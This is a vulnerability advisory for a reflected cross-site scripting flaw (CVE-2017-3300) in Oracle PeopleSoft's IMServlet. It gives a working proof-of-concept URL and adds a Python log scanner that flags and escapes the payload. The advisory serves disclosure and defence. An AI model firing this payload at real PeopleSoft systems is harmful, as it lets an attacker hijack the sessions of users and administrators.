| Title | Published | Views | Family |
|---|---|---|---|
| Oracle PeopleSoft Enterprise PeopleTools Component Cross-Site Scripting Vulnerability | 24 Jan 2017 00:00 | – | cnvd |
| CVE-2017-3300 | 27 Jan 2017 22:01 | – | cve |
| CVE-2017-3300 | 27 Jan 2017 22:01 | – | cvelist |
| Oracle PeopleSoft – XSS vulnerability | 31 Oct 2016 00:00 | – | erpscan |
| EUVD-2017-12421 | 7 Oct 2025 00:30 | – | euvd |
| CVE-2017-3300 | 27 Jan 2017 22:59 | – | nvd |
| Oracle Critical Patch Update Advisory - January 2017 | 17 Jan 2017 00:00 | – | oracle |
| CVE-2017-3300 | 27 Jan 2017 22:59 | – | osv |
| Oracle PeopleSoft HCM 9.2 Cross Site Scripting | 23 Jan 2017 00:00 | – | packetstorm |
| Code injection | 27 Jan 2017 22:59 | – | prion |
Application: Oracle PeopleSoft
Vendor: Oracle
Bugs: XSS
Reported: 31.10.2016
Vendor response: 1.11.2016
Date of Public Advisory: 17.01.2017
Reference: Oracle CPU Jan 2017
Authors: Vahagn Vardanyan, Dmitry Yudin
1. ADVISORY INFORMATION
Title: Oracle PeopleSoft XSS vulnerability
Advisory ID: [ERPSCAN-17-005]
Risk: High
Advisory URL:
https://erpscan.com/advisories/erpscan-17-005-oracle-peoplesoft-xss-vulnerability/
Date published: 17.01.2017
Vendor contacted: Oracle
2. VULNERABILITY INFORMATION
Class: XSS [CWE-79]
Remotely Exploitable: Yes
Locally Exploitable: No
CVE Name: CVE-2017-3300
CVSS Base Score: 6.1
3. VULNERABILITY DESCRIPTION
An attacker can craft a special HTTP request which, when opened by a victim, executes
attacker-controlled script in the victim's browser and allows the session data of
administrators or users to be hijacked.
4. VULNERABLE PACKAGES
$ psreleaseinfo
ToolsRelease: 8.55.03
ToolsReleaseDB: 8.55
PeopleSoft HCM 9.2
PORTAL.war/WEB-INF/lib/mcfIM.jar
$ md5sum ./PORTAL.war/WEB-INF/lib/mcfIM.jar
36982c7d3c059ec9c2d9aaf0c35a65d3 ./PORTAL.war/WEB-INF/lib/mcfIM.jar
5. SOLUTIONS AND WORKAROUNDS
Oracle CPU January 2017
6. AUTHOR
Dmitri Yudin (@ret5et)/ERPScan & Vahagn Vardanyan (@vah_13)/ERPScan
7. TECHNICAL DESCRIPTION
7.1. Proof of Concept
XSS:
http://localhost:8000/IMServlet?Method=MSN_PRESENCE&im_server_name=MSN&im_server=127.0.0.1:8000&im_to_user=%3Ca%20xmlns:a=%27http://www.w3.org/1999/xhtml%27%3E%3Ca:body%20onload=%27alert%28document.location%29%27/%3E%3C/a%3E
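The proof of concept above reflects markup supplied in the im_to_user parameter of IMServlet. The following detection script is an added example and is not part of the ERPScan advisory or of Oracle's product code: it parses web-server access-log lines (the sample lines are constructed, with the first request being the advisory's own PoC URL), URL-decodes every IMServlet query parameter, and flags values that contain a tag start or an event-handler attribute. It also shows the output-encoding step that neutralises such a value if it must be echoed back into HTML. Log format, parameter handling and the MARKUP_RE heuristic are assumptions of this example, not facts from the advisory.

```python
import html
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed access-log lines (not taken from any real server). Line 1 carries the
# advisory's PoC request; lines 2 and 3 are benign traffic used as negative cases.
SAMPLE_LOG = """\
127.0.0.1 - - [23/Jan/2017:10:00:01 +0000] "GET /IMServlet?Method=MSN_PRESENCE&im_server_name=MSN&im_server=127.0.0.1:8000&im_to_user=%3Ca%20xmlns:a=%27http://www.w3.org/1999/xhtml%27%3E%3Ca:body%20onload=%27alert%28document.location%29%27/%3E%3C/a%3E HTTP/1.1" 200 512
127.0.0.1 - - [23/Jan/2017:10:00:02 +0000] "GET /IMServlet?Method=MSN_PRESENCE&im_server_name=MSN&im_server=127.0.0.1:8000&im_to_user=jdoe HTTP/1.1" 200 512
127.0.0.1 - - [23/Jan/2017:10:00:03 +0000] "GET /psp/ps/EMPLOYEE/HRMS/h/?tab=DEFAULT HTTP/1.1" 200 2048
"""

# Common log format: the quoted request line holds method, target and protocol.
LOG_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Heuristic (assumption of this example): an IM user name never legitimately contains
# the start of a tag or an on*= event-handler attribute.
MARKUP_RE = re.compile(r'<\s*[a-zA-Z:/]|on[a-z]+\s*=', re.IGNORECASE)


def decode_fully(value, rounds=3):
    """URL-decode repeatedly so a double-encoded payload (%253C -> %3C -> <) is still seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_params(target):
    """Return {parameter: decoded value} for IMServlet query parameters carrying markup.

    Non-IMServlet paths return an empty dict so the check stays cheap on normal traffic.
    """
    parts = urlsplit(target)
    if not parts.path.endswith("/IMServlet"):
        return {}
    hits = {}
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for raw in values:
            decoded = decode_fully(raw)
            if MARKUP_RE.search(decoded):
                hits[name] = decoded
    return hits


def scan_log(text):
    """Return a list of (line_no, parameter, decoded value) for every flagged request."""
    findings = []
    for line_no, line in enumerate(text.splitlines(), 1):
        match = LOG_RE.search(line)
        if not match:
            continue
        for param, value in suspicious_params(match.group("target")).items():
            findings.append((line_no, param, value))
    return findings


def escape_for_html(value):
    """The mitigation side: HTML-encode a reflected value so '<', '>', quotes and '&'
    become entities and cannot start a tag or attribute when echoed into a page."""
    return html.escape(value, quote=True)


if __name__ == "__main__":
    for line_no, param, value in scan_log(SAMPLE_LOG):
        print(f"line {line_no}: {param} contains markup -> {value!r}")
        print(f"  safely encoded: {escape_for_html(value)}")
```

Running the script reports the first log line only; the same `suspicious_params` check can be dropped into a log-shipping pipeline or a WAF rule prototype, with the path test and MARKUP_RE tuned to the deployment.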
8. REPORT TIMELINE
Reported: 31.10.2016
Vendor response: 1.11.2016
Date of Public Advisory: 17.01.2017
9. REFERENCES
http://www.oracle.com/technetwork/security-advisory/cpujan2017-2881727.html
https://erpscan.com/advisories/erpscan-17-005-oracle-peoplesoft-xss-vulnerability/
# 0day.today [2018-01-01] #